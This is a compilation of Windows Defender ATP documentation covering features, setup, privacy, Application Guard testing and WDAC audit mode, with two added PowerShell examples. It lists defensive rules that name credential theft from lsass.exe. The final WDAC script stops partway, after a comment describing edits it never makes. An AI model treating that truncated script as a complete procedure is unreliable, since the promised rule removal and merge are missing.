Windows Defender Advanced Threat Protection (Windows Defender ATP)
Here are the new features in the latest release of Windows Defender ATP as well as security features in Windows
10 and Windows Server.

May 2019
The following capability is generally available (GA).
Threat protection reports
The threat protection report provides high-level information about alerts generated in your organization.
Microsoft Threat Experts
Microsoft Threat Experts is the new managed threat hunting service in Windows Defender ATP that
provides proactive hunting, prioritization, and additional context and insights that further empower security
operations centers (SOCs) to identify and respond to threats quickly and accurately. It provides an additional
layer of expertise and optics that Microsoft customers can utilize to augment security operation capabilities
as part of Microsoft 365.

April 2019
The following capability is generally available (GA).
Microsoft Threat Experts Targeted Attack Notification capability
Microsoft Threat Experts' Targeted Attack Notification alerts are tailored to organizations to provide as
much information as can be quickly delivered, thus bringing attention to critical threats in their network,
including the timeline, scope of breach, and the methods of intrusion.
Microsoft Defender ATP API
Microsoft Defender ATP exposes much of its data and actions through a set of programmatic APIs. Those
APIs will enable you to automate workflows and innovate based on Windows Defender ATP capabilities.
In preview
The following capabilities are included in the April 2019 preview release.
Threat & Vulnerability Management
A new built-in capability that uses a risk-based approach to the discovery, prioritization, and remediation of
endpoint vulnerabilities and misconfigurations.
Interoperability
Microsoft Defender ATP supports third-party applications to help enhance the detection, investigation, and
threat intelligence capabilities of the platform.

March 2019
In preview
The following capability is included in the March 2019 preview release.
Machine health and compliance report
The machine health and compliance report provides high-level information about the devices in your organization.

February 2019
The following capabilities are generally available (GA).
Incidents
Incident is a new entity in Windows Defender ATP that brings together all relevant alerts and related entities
to narrate the broader attack story, giving analysts better perspective on the purview of complex threats.
Onboard previous versions of Windows
Onboard supported versions of Windows machines so that they can send sensor data to the Windows
Defender ATP sensor.

October 2018
The following capabilities are generally available (GA).
Attack surface reduction rules
All Attack surface reduction rules are now supported on Windows Server 2019.
Controlled folder access
Controlled folder access is now supported on Windows Server 2019.
Custom detection
With custom detections, you can create custom queries to monitor events for any kind of behavior such as
suspicious or emerging threats. This can be done by leveraging the power of Advanced hunting through the
creation of custom detection rules.
Integration with Azure Security Center
Windows Defender ATP integrates with Azure Security Center to provide a comprehensive server
protection solution. With this integration Azure Security Center can leverage the power of Windows
Defender ATP to provide improved threat detection for Windows Servers.
Managed security service provider (MSSP) support
Windows Defender ATP adds support for this scenario by providing MSSP integration. The integration will
allow MSSPs to take the following actions: Get access to MSSP customer's Windows Defender Security
Center portal, fetch email notifications, and fetch alerts through security information and event
management (SIEM) tools.
Removable device control
Windows Defender ATP provides multiple monitoring and control features to help prevent threats from
removable devices, including new settings to allow or block specific hardware IDs.
Support for iOS and Android devices
iOS and Android devices are now supported and can be onboarded to the service.
Threat analytics
Threat Analytics is a set of interactive reports published by the Windows Defender ATP research team as
soon as emerging threats and outbreaks are identified. The reports help security operations teams assess
impact on their environment and provide recommended actions to contain, increase organizational
resilience, and prevent specific threats.
New in Windows 10 version 1809, there are two new attack surface reduction rules:
Block Adobe Reader from creating child processes
Block Office communication application from creating child processes.
Windows Defender Antivirus
Antimalware Scan Interface (AMSI) was extended to cover Office VBA macros as well. Office VBA +
AMSI: Parting the veil on malicious macros.
Windows Defender Antivirus, new in Windows 10 version 1809, can now run within a sandbox (preview),
increasing its security.
Configure CPU priority settings for Windows Defender Antivirus scans.
In preview
The following capabilities are included in the October 2018 preview release.
For more information on how to turn on preview features, see Preview features.
Information protection
Information protection is an integral part of the Microsoft 365 Enterprise suite, providing intelligent protection
to keep sensitive data secure while enabling productivity in the workplace. Windows Defender ATP is
seamlessly integrated in Microsoft Threat Protection to provide a complete and comprehensive data loss
prevention (DLP) solution for Windows devices.

NOTE
Partially available from Windows 10, version 1809.

Integration with Microsoft Cloud App Security
Microsoft Cloud App Security leverages Windows Defender ATP endpoint signals to allow direct visibility
into cloud application usage including the use of unsupported cloud services (shadow IT) from all Windows
Defender ATP monitored machines.

NOTE
Available from Windows 10, version 1809 or later.

Onboard Windows Server 2019
Windows Defender ATP now adds support for Windows Server 2019. You'll be able to onboard Windows
Server 2019 using the same method available for Windows 10 client machines.
Power BI reports using Windows Defender ATP data
Windows Defender ATP makes it easy to create a Power BI dashboard by providing an option straight from
the portal.

March 2018
Advanced Hunting
Query data using Advanced hunting in Windows Defender ATP.
Attack surface reduction rules
New attack surface reduction rules:
Use advanced protection against ransomware
Block credential stealing from the Windows local security authority subsystem (lsass.exe)
Block process creations originating from PSExec and WMI commands
Block untrusted and unsigned processes that run from USB
Block executable content from email client and webmail
Automated investigation and remediation
Use Automated investigations to investigate and remediate threats.

NOTE
Available from Windows 10, version 1803 or later.

Conditional access
Enable conditional access to better protect users, devices, and data.
Windows Defender ATP Community center
The Windows Defender ATP Community Center is a place where community members can learn,
collaborate, and share experiences about the product.
Controlled folder access
You can now block untrusted processes from writing to disk sectors using Controlled Folder Access.
Onboard non-Windows machines
Windows Defender ATP provides a centralized security operations experience for Windows as well as
non-Windows platforms. You'll be able to see alerts from various supported operating systems (OS) in Windows
Defender Security Center and better protect your organization's network.
Role-based access control (RBAC)
Using role-based access control (RBAC), you can create roles and groups within your security operations
team to grant appropriate access to the portal.
Windows Defender Antivirus
Windows Defender Antivirus now shares detection status between M365 services and interoperates with
Windows Defender ATP. For more information, see Use next-gen technologies in Windows Defender
Antivirus through cloud-delivered protection.
Block at first sight can now block non-portable executable files (such as JS, VBS, or macros) as well as
executable files. For more information, see Enable block at first sight.
Minimum requirements for Windows Defender ATP
4/8/2019

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
There are some minimum requirements for onboarding machines to the service.

Want to experience Windows Defender ATP? Sign up for a free trial.

TIP
Learn about the latest enhancements in Windows Defender ATP: What's new in Windows Defender ATP.
Windows Defender ATP demonstrated industry-leading optics and detection capabilities in the recent MITRE evaluation.
Read: Insights from the MITRE ATT&CK-based evaluation.

Licensing requirements
Windows Defender Advanced Threat Protection requires one of the following Microsoft Volume Licensing offers:
Windows 10 Enterprise E5
Windows 10 Education E5
Microsoft 365 E5 (M365 E5), which includes Windows 10 Enterprise E5
For more information on the array of features in Windows 10 editions, see Compare Windows 10 editions.
For a detailed comparison of Windows 10 commercial editions, see the comparison PDF.
For more information about licensing requirements for the Windows Defender ATP platform on Windows Server, see
Protecting Windows Servers with Windows Defender ATP.

Related topic
Validate licensing and complete setup
Onboard machines
Validate licensing provisioning and complete set up for Windows Defender ATP
4/22/2019

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Want to experience Windows Defender ATP? Sign up for a free trial.

Check license state
You can check the license state, and whether it was properly provisioned, through the Office 365 admin
center or through the Microsoft Azure portal.
1. In the Office 365 admin center, navigate to Billing > Subscriptions.
On the screen you will see all the provisioned licenses and their current Status.

2. To view your licenses, go to the Microsoft Azure portal and navigate to its license section.

Cloud Service Provider validation
To see which licenses are provisioned to your company, and to check their state, go to the Office 365 admin
center.
1. From the Partner portal, click Administer services > Office 365.
2. Clicking the Partner portal link uses the Admin on behalf option and gives you access to the customer's
Office 365 admin center.

Access Windows Defender Security Center for the first time
When you access Windows Defender Security Center for the first time, a setup wizard guides you through some
initial steps. At the end of the setup wizard, a dedicated cloud instance of Windows Defender ATP is created.
1. Each time you access the portal you will need to validate that you are authorized to access the product. This
Set up your permissions step will only be available if you are not currently authorized to access the
product.
Once the authorization step is completed, the Welcome screen will be displayed.
2. The Welcome screen will provide some details as to what is about to occur during the set up wizard.

You will need to set up your preferences for Windows Defender Security Center.
3. Set up preferences
a. Select data storage location
When onboarding the service for the first time, you can choose to store your data in the Microsoft
Azure datacenters in the United States, the European Union, or the United Kingdom. Once
configured, you cannot change the location where your data is stored. This provides a convenient
way to minimize compliance risk by actively selecting the geographic locations where your data will
reside. Microsoft will not transfer the data from the specified geolocation.

WARNING
This option cannot be changed without completely offboarding from Windows Defender ATP and completing
a new enrollment process.
b. Select the data retention policy
Windows Defender ATP stores data in your cloud instance for up to 6 months; however, you have the
option to set a shorter data retention period during this step of the set up process.

NOTE
This option can be changed at a later time.

c. Select the size of your organization
You will need to indicate the size of your organization based on an estimate of your current number of
employees.

NOTE
The organization size question is not related to how many licenses were purchased for your organization. It
is used by the service to optimize the creation of the data cluster for your organization.

d. Turn on preview features
Learn about new features in the Windows Defender ATP preview release and be among the first to
try upcoming features by turning on Preview features.
You'll have access to upcoming features which you can provide feedback on to help improve the
overall experience before features are generally available.
Toggle the setting between On and Off to choose Preview features.

NOTE
This option can be changed at a later time.

4. You will receive a warning notifying you that you won't be able to change some of your preferences once
you click Continue.

NOTE
Some of these options can be changed at a later time in Windows Defender Security Center.
5. A dedicated cloud instance of Windows Defender Security Center is being created at this time. This step will
take an average of 5 minutes to complete.

6. You are almost done. Before you can start using Windows Defender ATP you'll need to:
Onboard Windows 10 machines
Run detection test (optional)
IMPORTANT
If you click Start using Windows Defender ATP before onboarding machines you will receive the following
notification:

7. After onboarding machines you can click Start using Windows Defender ATP. You will now launch
Windows Defender ATP for the first time.

Related topics
Onboard machines to the Windows Defender Advanced Threat Protection service
Troubleshoot onboarding process and portal access issues
Windows Defender ATP preview features
4/5/2019

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
The Windows Defender ATP service is constantly being updated to include new feature enhancements and
capabilities.

Want to experience Windows Defender ATP? Sign up for a free trial.

Learn about new features in the Windows Defender ATP preview release and be among the first to try upcoming
features by turning on the preview experience.
For more information on capabilities that are generally available or in preview, see What's new in Windows
Defender ATP.

Turn on preview features
You'll have access to upcoming features which you can provide feedback on to help improve the overall experience
before features are generally available.
Turn on the preview experience setting to be among the first to try upcoming features.
1. In the navigation pane, select Settings > Advanced features > Preview features.
2. Toggle the setting between On and Off and select Save preferences.

Windows Defender ATP data storage and privacy
4/19/2019

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
This section covers some of the most frequently asked questions regarding privacy and data handling for
Windows Defender ATP.

NOTE
This document explains the data storage and privacy details related to Windows Defender ATP. For more information related
to Windows Defender ATP and other products and services like Windows Defender Antivirus and Windows 10, see Microsoft
Privacy Statement. See also Windows 10 privacy FAQ for more information.

What data does Windows Defender ATP collect?
Windows Defender ATP will collect and store information from your configured machines in a customer dedicated
and segregated tenant specific to the service for administration, tracking, and reporting purposes.
Information collected includes file data (such as file names, sizes, and hashes), process data (running processes,
hashes), registry data, network connection data (host IPs and ports), and machine details (such as machine
identifiers, names, and the operating system version).
Microsoft stores this data securely in Microsoft Azure and maintains it in accordance with Microsoft privacy
practices and Microsoft Trust Center policies.
This data enables Windows Defender ATP to:
Proactively identify indicators of attack (IOAs) in your organization
Generate alerts if a possible attack was detected
Provide your security operations with a view into machines, files, and URLs related to threat signals from your
network, enabling you to investigate and explore the presence of security threats on the network.
Microsoft does not use your data for advertising.

Data protection and encryption
The Windows Defender ATP service utilizes state-of-the-art data protection technologies which are based on
Microsoft Azure infrastructure.
There are various aspects relevant to data protection that our service takes care of. Encryption is one of the most
critical and it includes data encryption at rest, encryption in flight, and key management with Key Vault. For more
information on other technologies used by the Windows Defender ATP service, see Azure encryption overview.
In all scenarios, data is encrypted using 256-bit AES encryption at the minimum.

Do I have the flexibility to select where to store my data?
When onboarding the service for the first time, you can choose to store your data in Microsoft Azure datacenters
in the European Union, the United Kingdom, or the United States, or dedicated Azure Government data centers
(soon to be in preview). Once configured, you cannot change the location where your data is stored. This provides
a convenient way to minimize compliance risk by actively selecting the geographic locations where your data will
reside. Customer data in pseudonymized form may also be stored in the central storage and processing systems in
the United States.

Is my data isolated from other customer data?
Yes, your data is isolated through access authentication and logical segregation based on customer identifier. Each
customer can only access data collected from its own organization and generic data that Microsoft provides.

How does Microsoft prevent malicious insider activities and abuse of high privilege roles?
Microsoft developers and administrators have, by design, been given sufficient privileges to carry out their
assigned duties to operate and evolve the service. Microsoft deploys combinations of preventive, detective, and
reactive controls including the following mechanisms to help protect against unauthorized developer and/or
administrative activity:
Tight access control to sensitive data
Combinations of controls that greatly enhance independent detection of malicious activity
Multiple levels of monitoring, logging, and reporting
Additionally, Microsoft conducts background verification checks of certain operations personnel, and limits access
to applications, systems, and network infrastructure in proportion to the level of background verification.
Operations personnel follow a formal process when they are required to access a customer’s account or related
information in the performance of their duties.
Access to data for services deployed in Microsoft Azure Government data centers is only granted to operating
personnel who have been screened and approved to handle data that is subject to certain government regulations
and requirements, such as FedRAMP, NIST 800-171 (DIB), ITAR, IRS 1075, DoD L4, and CJIS.

Is data shared with other customers?
No. Customer data is isolated from other customers and is not shared. However, insights on the data resulting
from Microsoft processing, and which don’t contain any customer specific data, might be shared with other
customers. Each customer can only access data collected from its own organization and generic data that
Microsoft provides.

How long will Microsoft store my data? What is Microsoft's data retention policy?
At service onboarding
You can choose the data retention policy for your data. This determines how long Windows Defender ATP will store
your data. You can choose any period in the range of 1 month to six months to meet your company's
regulatory compliance needs.
At contract termination or expiration
Your data will be kept and will be available to you while the license is under grace period or suspended mode. At
the end of this period, that data will be erased from Microsoft's systems to make it unrecoverable, no later than
180 days from contract termination or expiration.

Can Microsoft help us maintain regulatory compliance?
Microsoft provides customers with detailed information about Microsoft's security and compliance programs,
including audit reports and compliance packages, to help customers assess Windows Defender ATP services
against their own legal and regulatory requirements. Windows Defender ATP is ISO 27001 certified and has a
roadmap for obtaining national, regional and industry-specific certifications.
Windows Defender ATP for Government (soon to be in preview) is currently undergoing audit for achieving
FedRAMP High accreditation as well as Provisional Authorization (PA) at Impact Levels 4 and 5.
By providing customers with compliant, independently-verified services, Microsoft makes it easier for customers
to achieve compliance for the infrastructure and applications they run.
For more information on the Windows Defender ATP ISO certification reports, see Microsoft Trust Center.

Want to experience Windows Defender ATP? Sign up for a free trial.


Assign user access to Windows Defender Security Center
4/5/2019

Applies to:
Azure Active Directory
Office 365
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Want to experience Windows Defender ATP? Sign up for a free trial.

Windows Defender ATP supports two ways to manage permissions:
Basic permissions management: Set permissions to either full access or read-only.
Role-based access control (RBAC): Set granular permissions by defining roles, assigning Azure AD user
groups to the roles, and granting the user groups access to machine groups. For more information on RBAC,
see Manage portal access using role-based access control.

NOTE
If you have already assigned basic permissions, you may switch to RBAC anytime. Consider the following before making the
switch:
Users with full access (users that are assigned the Global Administrator or Security Administrator directory role in Azure
AD) are automatically assigned the default Windows Defender ATP administrator role, which also has full access.
Additional Azure AD user groups can be assigned to the Windows Defender ATP administrator role after switching to
RBAC. Only users assigned to the Windows Defender ATP administrator role can manage permissions using RBAC.
Users that have read-only access (Security Readers) will lose access to the portal until they are assigned a role. Note that
only Azure AD user groups can be assigned a role under RBAC.
After switching to RBAC, you will not be able to switch back to using basic permissions management.

Related topic
Use basic permissions to access the portal
Manage portal access using RBAC
Evaluate Windows Defender ATP
4/5/2019

Windows Defender Advanced Threat Protection (Windows Defender ATP) is a unified platform for preventative
protection, post-breach detection, automated investigation, and response.
You can evaluate Windows Defender Advanced Threat Protection in your organization by starting your free trial.
You can also evaluate the different security capabilities in Windows Defender ATP by using the following
instructions.

Evaluate attack surface reduction
These capabilities help prevent attacks and exploitations from infecting your organization.
Evaluate attack surface reduction
Evaluate exploit protection
Evaluate network protection
Evaluate controlled folder access
Evaluate application guard
Evaluate network firewall

Evaluate next generation protection
Next gen protections help detect and block the latest threats.
Evaluate antivirus

See Also
Get started with Windows Defender Advanced Threat Protection
Application Guard testing scenarios
4/5/2019

Applies to: Windows Defender Advanced Threat Protection (Windows Defender ATP)
We've come up with a list of scenarios that you can use to test hardware-based isolation in your organization.

Application Guard in standalone mode
You can see how an employee would use standalone mode with Application Guard.
To test Application Guard in Standalone mode
1. Install Application Guard.
2. Restart the device, start Microsoft Edge, and then click New Application Guard window from the menu.

3. Wait for Application Guard to set up the isolated environment.

NOTE
Starting Application Guard too quickly after restarting the device might cause it to take a bit longer to load.
However, subsequent starts should occur without any perceivable delays.

4. Go to an untrusted, but safe URL (for this example, we used msn.com) and view the new Microsoft Edge
window, making sure you see the Application Guard visual cues.
Application Guard in Enterprise-managed mode
How to install, set up, turn on, and configure Application Guard for Enterprise-managed mode.
Install, set up, and turn on Application Guard
Before you can use Application Guard in enterprise mode, you must install Windows 10 Enterprise edition, version
1709, which includes the functionality. Then, you must use Group Policy to set up the required settings.
1. Install Application Guard.
2. Restart the device and then start Microsoft Edge.
3. Set up the Network Isolation settings in Group Policy:
a. Click on the Windows icon, type Group Policy, and then click Edit Group Policy.
b. Go to the Administrative Templates\Network\Network Isolation\Enterprise resource domains
hosted in the cloud setting.
c. For the purposes of this scenario, type .microsoft.com into the Enterprise cloud resources box.
d. Go to the Administrative Templates\Network\Network Isolation\Domains categorized as both
work and personal setting.
e. For the purposes of this scenario, type bing.com into the Neutral resources box.
4. Go to the Computer Configuration\Administrative Templates\Windows Components\Windows
Defender Application Guard\Turn on Windows Defender Application Guard in Enterprise Mode
setting.
5. Click Enabled, choose Option 1, and click OK.
NOTE
Enabling this setting verifies that all the necessary settings are properly configured on your employee devices,
including the network isolation settings set earlier in this scenario.

6. Start Microsoft Edge and type www.microsoft.com.
After you submit the URL, Application Guard determines the URL is trusted because it uses the domain
you’ve marked as trusted and shows the site directly on the host PC instead of in Application Guard.
7. In the same Microsoft Edge browser, type any URL that isn’t part of your trusted or neutral site lists.
After you submit the URL, Application Guard determines the URL is untrusted and redirects the request to
the hardware-isolated environment.

Customize Application Guard
Application Guard lets you specify your configuration, allowing you to create the proper balance between
isolation-based security and productivity for your employees.
Application Guard provides the following default behavior for your employees:
No copying and pasting between the host PC and the isolated container.
No printing from the isolated container.
No data persistence from one isolated container to another isolated container.
You have the option to change each of these settings to work with your enterprise from within Group Policy.
Applies to:
Windows 10 Enterprise edition, version 1709 or higher
Windows 10 Professional edition, version 1803
Copy and paste options
1. Go to the Computer Configuration\Administrative Templates\Windows Components\Windows
Defender Application Guard\Configure Windows Defender Application Guard clipboard settings.
2. Click Enabled and click OK.

3. Choose how the clipboard works:
Copy and paste from the isolated session to the host PC
Copy and paste from the host PC to the isolated session
Copy and paste both directions
4. Choose what can be copied:
1. Only text can be copied between the host PC and the isolated container.
2. Only images can be copied between the host PC and the isolated container.
3. Both text and images can be copied between the host PC and the isolated container.
5. Click OK.
Print options
1. Go to the Computer Configuration\Administrative Templates\Windows Components\Windows
Defender Application Guard\Configure Windows Defender Application Guard print settings.
2. Click Enabled and click OK.

3. Based on the list provided in the setting, choose the number that best represents what type of printing
should be available to your employees. You can allow any combination of local, network, PDF, and XPS
printing.
4. Click OK.
Data persistence options
1. Go to the Computer Configuration\Administrative Templates\Windows Components\Windows
Defender Application Guard\Allow data persistence for Windows Defender Application Guard
setting.
2. Click Enabled and click OK.
3. Open Microsoft Edge and browse to an untrusted, but safe URL.
The website opens in the isolated session.
4. Add the site to your Favorites list and then close the isolated session.
5. Log out and back on to your device, opening Microsoft Edge in Application Guard again.
The previously added site should still appear in your Favorites list.

NOTE
If you don't allow or turn off data persistence, restarting a device or logging in and out of the isolated container
triggers a recycle event that discards all generated data, including session cookies, Favorites, and so on, removing the
data from Application Guard. If you turn on data persistence, all employee-generated artifacts are preserved across
container recycle events. However, these artifacts only exist in the isolated container and aren’t shared with the host
PC. This data persists after restarts and even through build-to-build upgrades of Windows 10.

If you turn on data persistence, but later decide to stop supporting it for your employees, you can use our Windows-
provided utility to reset the container and to discard any personal data.

To reset the container:
1. Open a command-line program and navigate to Windows\System32.
2. Type wdagtool.exe cleanup.
The container environment is reset, retaining only the employee-generated data.
3. Type wdagtool.exe cleanup RESET_PERSISTENCE_LAYER.
The container environment is reset, including discarding all employee-generated data.
Applies to:
Windows 10 Enterprise edition, version 1803
Windows 10 Professional edition, version 1803
Download options
1. Go to the Computer Configuration\Administrative Templates\Windows Components\Windows
Defender Application Guard\Allow files to download and save to the host operating system from
Windows Defender Application Guard setting.
2. Click Enabled and click OK.

3. Log out and back on to your device, opening Microsoft Edge in Application Guard again.
4. Download a file from Windows Defender Application Guard.
5. Check to see the file has been downloaded into This PC > Downloads > Untrusted files.
Hardware acceleration options
1. Go to the Computer Configuration\Administrative Templates\Windows Components\Windows
Defender Application Guard\Allow hardware-accelerated rendering for Windows Defender
Application Guard setting.
2. Click Enabled and click OK.
3. Once you have enabled this feature, open Microsoft Edge and browse to an untrusted, but safe URL with
video, 3D, or other graphics-intensive content. The website opens in an isolated session.
4. Assess the visual experience and battery performance.
Applies to:
Windows 10 Enterprise edition, version 1809
Windows 10 Professional edition, version 1809
File trust options
1. Go to the Computer Configuration\Administrative Templates\Windows Components\Windows
Defender Application Guard\Allow users to trust files that open in Windows Defender
Application Guard setting.
2. Click Enabled, set Options to 2, and click OK.
3. Log out and back on to your device, opening Microsoft Edge in Application Guard again.
4. Open a file in Edge, such as an Office 365 file.
5. Check to see that an antivirus scan completed before the file was opened.
Camera and microphone options
1. Go to the Computer Configuration\Administrative Templates\Windows Components\Windows
Defender Application Guard\Allow camera and microphone access in Windows Defender
Application Guard setting.
2. Click Enabled and click OK.
3. Log out and back on to your device, opening Microsoft Edge in Application Guard again.
4. Open an application with video or audio capability in Edge.
5. Check that the camera and microphone work as expected.
Root certificate sharing options
1. Go to the Computer Configuration\Administrative Templates\Windows Components\Windows
Defender Application Guard\Allow Windows Defender Application Guard to use Root Certificate
Authorities from the user's device setting.
2. Click Enabled, copy the thumbprint of each certificate to share, separated by a comma, and click OK.
3. Log out and back on to your device, opening Microsoft Edge in Application Guard again.
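The root certificate sharing setting above takes the thumbprints of the certificates to share as one comma-separated value. As an added example (not code from the Microsoft documentation), the following PowerShell function reads the local machine's Root store, keeps only currently valid, self-signed certificates whose Subject matches a pattern you supply, and joins their thumbprints in that form. The function name, its -SubjectLike parameter and the 'Contoso Root CA' pattern are illustrative assumptions, not names from Windows or from the policy.

```powershell
# Added example, not from the Microsoft documentation: build the comma-separated
# thumbprint list for "Allow Windows Defender Application Guard to use Root Certificate
# Authorities from the user's device". Function and parameter names are this script's own.

function Get-SharedRootCaThumbprints {
    [CmdletBinding()]
    param(
        # Wildcard pattern matched against the certificate Subject, e.g. '*Contoso Root CA*'
        [Parameter(Mandatory)]
        [string]$SubjectLike,

        # Store to read; machine-wide roots are the usual source for a device-level policy
        [string]$StorePath = 'Cert:\LocalMachine\Root'
    )

    $certs = Get-ChildItem -Path $StorePath |
        Where-Object { $_.Subject -like $SubjectLike }

    if (-not $certs) {
        throw "No certificates in $StorePath match subject pattern '$SubjectLike'."
    }

    $now = Get-Date
    foreach ($c in $certs) {
        # Share only true roots (self-signed) that are currently valid; an intermediate or
        # expired certificate in the list would be a silent configuration error.
        if ($c.Subject -ne $c.Issuer) {
            Write-Warning "Skipping $($c.Subject): not self-signed, so not a root CA."
            continue
        }
        if ($c.NotAfter -lt $now -or $c.NotBefore -gt $now) {
            Write-Warning "Skipping $($c.Subject): not valid now ($($c.NotBefore) to $($c.NotAfter))."
            continue
        }
        $c
    }
}

# Usage: the printed value is what you paste into the policy setting
# (thumbprints separated by commas, no spaces). Pattern is a constructed example.
$shared = Get-SharedRootCaThumbprints -SubjectLike '*Contoso Root CA*'
$policyValue = ($shared.Thumbprint | Sort-Object -Unique) -join ','
Write-Output $policyValue
```

Run it in the same elevated session you use for Group Policy edits, check the warnings for anything it skipped, and compare the printed list against the certificates you actually intended to trust inside the container before saving the setting.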
Audit Windows Defender Application Control policies
3/19/2019

Applies to:
Windows 10
Windows Server 2016
Running Application Control in audit mode allows administrators to discover any applications that were missed
during an initial policy scan and to identify any new applications that have been installed and run since the original
policy was created. While a WDAC policy is running in audit mode, any binary that runs and would have been
denied had the policy been enforced is logged in the Applications and Services
Logs\Microsoft\Windows\CodeIntegrity\Operational event log. When these logged binaries have been
validated, they can easily be added to a new WDAC policy. When the new exception policy is created, you can
merge it with your existing WDAC policies.
Before you begin this process, you need to create a WDAC policy binary file. If you have not already done so, see
Create an initial Windows Defender Application Control policy from a reference computer.
To audit a Windows Defender Application Control policy with local policy:
1. Before you begin, find the *.bin policy file, for example, DeviceGuardPolicy.bin. Copy the file to
C:\Windows\System32\CodeIntegrity.
2. On the computer you want to run in audit mode, open the Local Group Policy Editor by running
GPEdit.msc.

NOTE
The computer that you will run in audit mode must be clean of viruses or malware. Otherwise, in the process
that you follow after auditing the system, you might unintentionally merge in a policy that allows viruses or
malware to run.
An alternative method to test a policy is to rename the test file to SIPolicy.p7b and drop it into
C:\Windows\System32\CodeIntegrity, rather than deploy it by using the Local Group Policy Editor.

3. Navigate to Computer Configuration\Administrative Templates\System\Windows Defender
Device Guard, and then select Deploy Windows Defender Application Control. Enable this setting by
using the appropriate file path, for example, C:\Windows\System32\CodeIntegrity\DeviceGuardPolicy.bin,
as shown in Figure 1.

NOTE
You can copy the WDAC policies to a file share to which all computer accounts have access rather than copy
them to every system.
You might have noticed that the GPO setting references a .p7b file and this policy uses a .bin file. Regardless of
the type of policy you deploy (.bin, .p7b, or .p7), they are all converted to SIPolicy.p7b when dropped onto the
computers running Windows 10. We recommend that you make your WDAC policy names friendly and allow
the system to convert the policy names for you. By doing this, it ensures that the policies are easily
distinguishable when viewed in a share or any other central repository.
Figure 1. Deploy your Windows Defender Application Control policy
4. Restart the reference system for the WDAC policy to take effect.
5. Use the system as you normally would, and monitor code integrity events in the event log. While in audit
mode, any exception to the deployed WDAC policy will be logged in the Applications and Services
Logs\Microsoft\Windows\CodeIntegrity\Operational event log, as shown in Figure 2.
Figure 2. Exceptions to the deployed WDAC policy
You will be reviewing the exceptions that appear in the event log, and making a list of any applications that
should be allowed to run in your environment.
6. If you want to create a catalog file to simplify the process of including unsigned LOB applications in your
WDAC policy, this is a good time to create it. For information, see Deploy catalog files to support Windows
Defender Application Control.
Now that you have a WDAC policy deployed in audit mode, you can capture any audit information that appears in
the event log. This is described in the next section.

Create a Windows Defender Application Control policy that captures audit information from the event log
Use the following procedure after you have been running a computer with a WDAC policy in audit mode for a
period of time. When you are ready to capture the needed policy information from the event log (so that you can
later merge that information into the original WDAC policy), complete the following steps.
1. Review the audit information in the event log. From the WDAC policy exceptions that you see, make a list of
any applications that should be allowed to run in your environment, and decide on the file rule level that
should be used to trust these applications.
Although the Hash file rule level will catch all of these exceptions, it may not be the best way to trust all of
them. For information about file rule levels, see Windows Defender Application Control file rule levels in
"Deploy Windows Defender Application Control: policy rules and file rules."
Your event log might also contain exceptions for applications that you eventually want your WDAC policy to
block. If these appear, make a list of these also, for a later step in this procedure.
2. In an elevated Windows PowerShell session, initialize the variables that will be used. The example filename
shown here is DeviceGuardAuditPolicy.xml:

$CIPolicyPath=$env:userprofile+"\Desktop\"
$CIAuditPolicy=$CIPolicyPath+"DeviceGuardAuditPolicy.xml"

3. Use New-CIPolicy to generate a new WDAC policy from logged audit events. This example uses a file rule
level of Hash and includes 3> CIPolicylog.txt, which redirects warning messages to a text file,
CIPolicylog.txt.

New-CIPolicy -Audit -Level Hash -FilePath $CIAuditPolicy -UserPEs 3> CIPolicylog.txt

NOTE
When you create policies from audit events, you should carefully consider the file rule level that you select to trust.
The preceding example uses the Hash rule level, which is the most specific. Any change to the file (such as replacing
the file with a newer version of the same file) will change the Hash value, and require an update to the policy.

4. Find and review the WDAC audit policy .xml file that you created. If you used the example variables as
shown, the filename will be DeviceGuardAuditPolicy.xml, and it will be on your desktop. Look for the
following:
Any applications that were caught as exceptions, but should be allowed to run in your environment.
These are applications that should be in the .xml file. Leave these as-is in the file.
Any applications that actually should not be allowed to run in your environment. Edit these out of the
.xml file. If they remain in the .xml file, and the information in the file is merged into your existing
WDAC policy, the policy will treat the applications as trusted, and allow them to run.
You can now use this file to update the existing WDAC policy that you ran in audit mode by merging the two
policies. For instructions on how to merge this audit policy with the existing WDAC policy, see the next section,
Merge Windows Defender Application Control policies.

NOTE
You may have noticed that you did not generate a binary version of this policy as you did in Create a Windows Defender
Application Control policy from a reference computer. This is because WDAC policies created from an audit log are not
intended to run as stand-alone policies but rather to update existing WDAC policies.
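The following script is an added example, not part of the original topic: it runs the New-CIPolicy step from this section, lists which files the resulting audit policy would allow, edits out the rules for applications that must stay blocked (step 4), and merges the cleaned policy into the original one as the next section describes. The InitialScan.xml name and the $BlockedApps list are placeholders, and the XML handling assumes the SiPolicy schema (FileRules/Allow elements with FriendlyName and Hash attributes, referenced by FileRuleRef entries under SigningScenarios).

```powershell
# Added example (not from the original page). Run from an elevated session on a
# computer that has been running the WDAC policy in audit mode.
# Assumptions: file names follow this section; InitialScan.xml stands in for the
# original reference-computer policy; $BlockedApps is a constructed list.

$CIPolicyPath  = $env:userprofile + "\Desktop\"
$CIAuditPolicy = $CIPolicyPath + "DeviceGuardAuditPolicy.xml"
$InitialPolicy = $CIPolicyPath + "InitialScan.xml"        # placeholder
$MergedPolicy  = $CIPolicyPath + "MergedPolicy.xml"
$LogFile       = $CIPolicyPath + "CIPolicylog.txt"

# Step 3 of this section: build a Hash-level policy from the CodeIntegrity audit
# events; warning messages (stream 3) go to CIPolicylog.txt.
New-CIPolicy -Audit -Level Hash -FilePath $CIAuditPolicy -UserPEs 3> $LogFile

# Constructed list of applications that appeared in the audit log but must NOT be
# trusted (the "edit these out of the .xml file" case in step 4).
$BlockedApps = @('C:\Tools\unwanted\tool.exe')

[xml]$Policy = Get-Content -Path $CIAuditPolicy
$ns = New-Object System.Xml.XmlNamespaceManager($Policy.NameTable)
$ns.AddNamespace('p', 'urn:schemas-microsoft-com:sipolicy')

# Hash rules keep the original path in FriendlyName (for example
# "C:\...\app.exe Hash Sha256"), which is what you compare against the list
# of applications you made in step 1.
$Allows = @($Policy.SelectNodes('//p:FileRules/p:Allow', $ns))
$Allows |
    ForEach-Object { $_.FriendlyName -replace ' Hash .*$', '' } |
    Sort-Object -Unique |
    ForEach-Object { "would be allowed: $_" }

# Step 4: remove rules for apps that should stay blocked. Every Allow rule is
# referenced by ID from a SigningScenario, so the FileRuleRef is removed as well;
# a dangling reference makes the policy fail to convert later.
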